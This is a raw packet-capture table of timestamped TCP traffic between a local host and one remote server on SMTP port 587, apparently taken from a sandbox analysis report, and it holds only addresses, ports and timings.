Jan 14, 2021 08:00:51.882047892 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.882150888 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.882179022 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.882214069 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.882236004 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.882278919 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.882339954 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.882498026 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.882703066 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.959464073 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.960371017 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:51.961277962 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.961548090 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.961932898 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.962253094 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.962447882 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.962611914 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:51.962758064 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.024285078 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.024318933 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.024334908 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.024411917 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.024467945 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.024602890 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.024621964 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.024718046 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.024758101 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.025023937 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.026850939 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.026887894 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.026978016 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.072501898 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.072546005 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.072597027 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.072653055 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.072704077 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.072856903 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.072875977 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.072949886 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.073087931 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.073158026 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.152302980 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.152338982 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.152405024 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.152425051 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.153038979 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.153057098 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.153134108 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.153465033 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.153592110 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.153604031 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.214826107 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.214869976 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.214888096 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.214906931 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.214950085 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.214962959 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.215013981 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.215095997 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.215224028 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.215241909 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.215284109 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.215316057 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.215327024 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.215379000 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.217286110 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.217405081 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.263786077 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.263825893 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.263842106 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.263941050 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.263988972 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.264070988 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.264147997 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.264478922 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.264501095 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.264563084 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.264591932 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.264831066 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.264976025 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.342555046 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.342848063 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.342870951 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.343135118 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.343192101 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.343286037 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.343568087 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.343647957 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.405293941 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.405322075 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.405338049 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.405445099 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.405561924 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.405627012 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.405687094 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.405704975 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.405776024 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.405803919 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.405832052 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.408257008 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.408288956 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.408375025 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.454750061 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.454790115 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.455025911 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.455378056 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.455420017 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.455440998 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.455708027 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.455770016 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.455786943 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.533015966 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.533314943 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.533508062 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.533514023 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.533628941 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.533639908 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.533646107 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.533696890 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.533736944 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.534835100 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.544320107 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.596024990 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.596168041 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.596445084 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.596482038 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.599235058 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.599281073 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.645526886 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.645560980 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.645742893 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.645817995 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.668035030 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.716672897 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.723783016 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.723824024 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.723841906 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.723856926 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.723872900 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.723968029 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.724000931 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.724061966 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.724087000 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.724117994 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.724252939 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.725188017 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.734204054 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.734745979 CET	587	49779	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.738375902 CET	49779	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.747953892 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.748121977 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.748254061 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.748390913 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.748508930 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.748640060 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.748763084 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.748892069 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.749012947 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.749146938 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.749274015 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.749417067 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.749538898 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.749722004 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.749834061 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.914454937 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.914587975 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.914627075 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.914644003 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.914787054 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.918606997 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:52.938838005 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.938873053 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.939156055 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.939177990 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.939815998 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.952636957 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:52.997910976 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:53.109116077 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.109282017 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:53.301513910 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.301795006 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:53.491763115 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.492562056 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.492883921 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:53.587814093 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:53.682801008 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.683433056 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:53.778692007 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.780034065 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.780072927 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.780174971 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:53.873342991 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.873452902 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.873547077 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:53.873687983 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:54.330775976 CET	49778	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:54.333439112 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:54.334405899 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:54.522397041 CET	587	49778	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.523494005 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.523586988 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.524379969 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.525595903 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.533885956 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:54.723839045 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.724924088 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.727046967 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:54.918057919 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.919934988 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:54.922528028 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:55.112829924 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:55.115580082 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:55.117697954 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:55.307755947 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:55.342926979 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:55.388782024 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:56.786845922 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:56.824444056 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:56.824666977 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:56.976774931 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:56.977648973 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.003526926 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.003707886 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.003873110 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.004029989 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.004203081 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.004370928 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.004530907 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.016239882 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.016604900 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.016671896 CET	587	49780	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.016748905 CET	49780	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.018186092 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.193582058 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.193615913 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.193686962 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.193710089 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.193830967 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.193886042 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.194281101 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.194305897 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.194355965 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.194391012 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.194394112 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.194427967 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.194482088 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.194535971 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.194708109 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.209950924 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.210242033 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.383760929 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.383780956 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.383892059 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.383939981 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.383946896 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.384270906 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.384306908 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.384367943 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.384380102 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.384475946 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.384629011 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.384694099 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.400191069 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.401289940 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.404664040 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.574867010 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.575105906 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.575162888 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.575185061 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.575193882 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.575206995 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.575251102 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.575345993 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.575520039 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.575551033 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.575611115 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.597613096 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.598412037 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.765238047 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765263081 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765270948 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765283108 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765470028 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765481949 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765496016 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.765557051 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.765561104 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765572071 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.765640020 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765654087 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.765661001 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.788389921 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.788528919 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.789999962 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.790739059 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.791053057 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.791937113 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.930915117 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.941225052 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.955809116 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.955872059 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.955903053 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.956067085 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.956115007 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.956146955 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.956710100 CET	587	49781	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.956775904 CET	49781	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:57.980871916 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.980900049 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.981730938 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.981977940 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:57.982436895 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.121520996 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.121620893 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.131987095 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.132102013 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.172485113 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.173482895 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.173955917 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.314656019 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.317277908 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.324326038 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.325126886 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.363887072 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.367535114 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.367957115 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.507316113 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.508018017 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.508310080 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.516216040 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.517420053 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.517796993 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.558993101 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.562052965 CET	587	49782	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.562733889 CET	49782	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.698154926 CET	587	49784	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.699007034 CET	49784	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.708192110 CET	587	49783	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:58.708969116 CET	49783	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:58.752706051 CET	587	49782	199.193.7.228	192.168.2.3
